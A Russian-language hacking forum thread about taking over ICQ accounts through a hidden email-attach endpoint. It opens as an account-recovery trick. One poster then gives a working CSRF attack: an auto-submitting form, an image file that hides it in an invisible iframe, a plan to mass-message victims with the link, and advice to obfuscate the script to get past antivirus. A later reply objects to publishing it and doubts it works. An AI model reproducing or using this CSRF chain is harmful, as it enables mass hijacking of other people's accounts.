Представляю твоему вниманию замечательный способ возвращения угнанного ICQ номера, но сначала немного теории Итак, новая система ретрива на ICQ.com вводилась 2 раза: 1 раз : одновременно с введением новой системы появилась возможность вписывать свое мыло в детали номера через страничку http://www.icq.com/people/НОМЕР/edit/ (а не через https://www.icq.com/register/email_attach.php), при этом тебе всего лишь нужно было быть залогиненным на асечном сайте; 2 раз : после первых тестов новую систему убрали и временно вернули старую. После повторного введения новой системы ретрива мыло для логина вновь менялось лишь на странице https://www.icq.com/register/email_attach.php. После финального включения новой системы ретрива разработчики зачем-то решили оставить возможность прикрепления нового мыла с помощью первого варианта, но спрятали эту возможность глубоко в html-сорцах своих страниц Если у тебя угнали асю, твой алгоритм должен быть следующим (предварительно ты должен иметь живую сессию на ICQ.com): 1. Сохрани на свой жесткий диск следующую html-страницу: Code: [COLOR=Lime]<form action="http://icq.com/people/include/xhr.php" method="POST"> <input name="f" value="resendMail"/><br/> <input name="e" value="твое_мыло@мыло.ru"/><br/> <input name="lang" value="en"/><br/> <input name="server" value="prod"/><br/> <input type="submit" value="ok"/><br/> </form> [/COLOR] 2. Открывай данную страницу в браузере и жми на сабмит; 3. После сабмита на твое вписанное мыло упадет ссылка для подтверждения нового "email for login"; 4. Переходи по данной ссылке и восстанавливай пароль на новое мыло с помощью https://icq.com/password ----------- Первоисточник: Возвращение угнанного номера ICQ by M4g (c) 2010
В связи с попаданием в паблик этого материала возникает большая вероятность появления нового кидалова. Как с этим бороться и не попадаться на крючок? - Пользоваться услугами проверенных селлеров!
автоматизация 1. Создаешь файл 1.php Содержимое: PHP: <body onload="document.getElementById('l').submit();"> <form id='l' action="http://icq.com/people/include/xhr.php" method="POST"> <input name="f" value="resendMail"/><br/> <input name="e" value="твое_мыло@мыло.ru"/><br/> <input name="lang" value="en"/><br/> <input name="server" value="prod"/><br/> <input type="submit" value="ok"/><br/> </form> 2. Создаешь файл 2.jpg Содержимое: PHP: <img src="http://c.icq.com/homepage/img/park_R_2010.jpg"> <iframe width=1 height=0 style="position: absolute; visibility: hidden;" src="http://site.ru/1.php"></iframe> 3. Создаешь файл .htaccess Содержимое: Делаешь рассылку в icq.com со словами "Прикольная картинка, как тебе? http://site.ru/2.jpg". На почту получаешь кучу ретривов и никаких кукисов. Самый чистый csrf. Если есть масть, переводи фрейм в яваскрипт, а яваскрипт шифруй уже каким хочешь энкодером для обхода фрейма антивирусами. ps. Ко мне в аську за пояснениями не стучаться, 911 временно не работает. Этому методу уже как минимум год, так как я не асечник, он так и остался в моей голове. По ходу асечники доперли до него только сейчас в связи с нововведениями icq.com.
то есть ты тему пали, а я молчи в трубочку????? Если уж палишь тему, пали ее качественно. Молчал бы ты, молчал бы и я, который молчал об этом почти год, так что зря вообще создание темы, а не
satana-fu, в материале, который выложил я не описывался метод, как можно массово поиметь номерков, он представлялся лишь как способ вернуть свой уин. Кто поумнее сам бы понял что к чему, остальным хватило бы знаний быть предупреждённым, что вообще такой способ возврата существует, не описывая как именно его можно использовать со злым умыслом. Ты же в деталях описал именно один из способов нехорошего применения этих знаний, тем самым количество кул-хацкеров на зимних каникулах возрастёт существенно и много людей может пострадать. З.Ы. на самом деле через csrf сделать ретрив не прокатит, т.к. скрипт нужно с локальной машины запускать, а не с хостинга. А впарить закриптованый яваскрипт сравнимо со впарванием трояна, это не каждому дано.